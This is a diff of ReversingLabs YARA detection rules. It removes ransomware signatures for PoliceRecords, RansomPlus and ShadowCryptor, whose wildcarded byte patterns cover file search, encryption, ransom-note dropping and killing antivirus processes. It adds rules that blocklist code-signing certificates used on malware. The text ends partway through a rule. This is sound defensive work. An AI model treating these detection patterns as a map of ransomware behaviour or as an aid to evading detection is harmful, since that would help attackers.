"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (( all of ($disable_services_p*)) and ( all of ($search_files_p*)) and ($encrypt_files)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Marts GmbH" and (pe.signatures[i].serial=="00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures[i].serial=="be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9") and 1676246400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE { meta: - description = "Yara rule that detects PoliceRecords ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bacd3f98-a069-58ca-8423-01fcef7d4062" - date = "2022-08-02" - modified = "2022-08-02" + id = "1aebd2be-b22c-5102-a449-27025f61cce6" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16100-L16118" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "PoliceRecords" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ?? - ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? - 03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? - 25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? - ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A - } - $find_files = { - 11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E - 69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ?? - 2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00 - 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? - 00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ?? - ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? - ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C - ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 - ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? - ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F - ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? - 13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A - } - $desktop_kill_tick = { - 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00 - 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 2A - } - $drop_ransom_note = { - 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? - 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 26 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DIG IN VISION SP Z O O" and (pe.signatures[i].serial=="00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures[i].serial=="fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24") and 1604361600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "8a6f4a15-08a5-5ca5-a743-55075726e744" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16120-L16136" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($desktop_kill_tick) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BELLAP LIMITED" and pe.signatures[i].serial=="69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE { meta: - description = "Yara rule that detects RansomPlus ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ee96eab6-104d-560f-adae-6d5f0ba5d469" - date = "2020-07-15" - modified = "2020-07-15" + id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16138-L16154" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RansomPlus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_1_0 = { - 55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? - 8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? - ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? - ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? - 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 - } - $find_files_1_1 = { - 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ?? - 41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ?? - ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52 - E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 - } - $find_files_1_2 = { - 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB - ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? - 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 - 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 - 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D - ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85 - FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7 - 75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D - 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F - 43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8 - 0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74 - } - $encrypt_files = { - 8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ?? - ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE - ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B - D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? - 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 - ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B - 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? - E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D - ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? - 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 - ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B - C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? - ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B - 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "5acd2e61-1c04-5cc5-8773-25856fc163c4" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16156-L16174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMO-K Limited Liability Company" and (pe.signatures[i].serial=="00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures[i].serial=="d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b") and 1444780800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE { meta: - description = "Yara rule that detects ShadowCryptor ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "983e8927-4829-540f-9697-886226fd54ce" - date = "2021-02-11" - modified = "2021-02-11" + id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16176-L16192" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ShadowCryptor" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B - BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? - 8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D - ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 - ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 - 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ?? - ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $encrypt_files = { - 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? - 33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B - F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? - ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? - 80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ?? - ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ?? - 8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48 - 03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83 - C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46 - ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ?? - 50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C - 24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 - ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ?? - 66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D - 41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8 - ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? - E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33 - CC E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $terminate_antivirus_processes_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 